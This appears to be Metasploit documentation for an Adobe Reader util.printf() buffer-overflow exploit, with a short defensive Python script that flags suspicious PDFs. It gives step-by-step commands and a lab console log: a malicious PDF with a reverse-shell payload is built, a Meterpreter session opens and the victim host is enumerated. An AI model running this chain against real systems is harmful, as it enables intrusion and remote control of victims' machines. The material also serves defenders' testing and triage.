## Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.

Link to vulnerable software: [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)

## Verification Steps

1. Install the application on the target machine
2. Start msfconsole
3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
5. Do: ```set LHOST [IP]```
6. Do: ```exploit```
7. Do: ```use exploit/multi/handler```
8. Do: ```set LHOST [IP]```
9. Do: ```exploit```
10. Do: Open the PDF on the target machine with the vulnerable software

## Scenarios

### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

```
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
FILENAME => utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > exploit

[*] Creating 'utilprintf.pdf' file...
[+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700

meterpreter > sysinfo
Computer        : COMPUTER_1
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on COMPUTER_1

Installed Applications
======================

 Name            Version
 ----            -------
 Adobe Reader 8  8.0.0

[+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
```
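
For defenders triaging PDFs on hosts that still run Adobe Reader older than 8.1.3, the following added example (not part of the module or its documentation) flags documents that carry a JavaScript action and call `util.printf()`, including calls inside Flate-compressed streams. The function names are illustrative, and the sample PDF fragment is constructed and benign.

```python
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
JS_KEY_RE = re.compile(rb"/(?:JavaScript|JS)\b")
PRINTF_RE = re.compile(rb"util\s*\.\s*printf\s*\(")


def decoded_views(pdf_bytes):
    """Yield (label, bytes) for the raw file and each stream that inflates."""
    yield "raw", pdf_bytes
    for index, match in enumerate(STREAM_RE.finditer(pdf_bytes)):
        try:
            # decompressobj tolerates the EOL bytes left before "endstream"
            yield f"stream{index}", zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not Flate data; the raw view already covers it


def triage(pdf_bytes):
    """Report JavaScript actions and util.printf() call sites for analyst review."""
    # PDF names may hide characters as #xx escapes (/J#61vaScript); undo those first.
    names = NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf_bytes)
    calls = [(label, m.start())
             for label, data in decoded_views(pdf_bytes)
             for m in PRINTF_RE.finditer(data)]
    # A hit is a triage signal only: it does not inspect the call's arguments.
    return {"has_javascript": bool(JS_KEY_RE.search(names)), "printf_calls": calls}


def build_sample(script=b'util.printf("%d", 1);'):
    """Constructed, benign PDF fragment: one Flate-compressed JavaScript action."""
    body = zlib.compress(script)
    return (b"%PDF-1.4\n1 0 obj << /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
            b"3 0 obj << /Filter /FlateDecode /Length " + str(len(body)).encode()
            + b" >>\nstream\n" + body + b"\nendstream endobj\n%%EOF\n")


if __name__ == "__main__":
    print(triage(build_sample()))
```

Only Flate-compressed and uncompressed streams are inspected; other filters and object streams would need a full PDF parser.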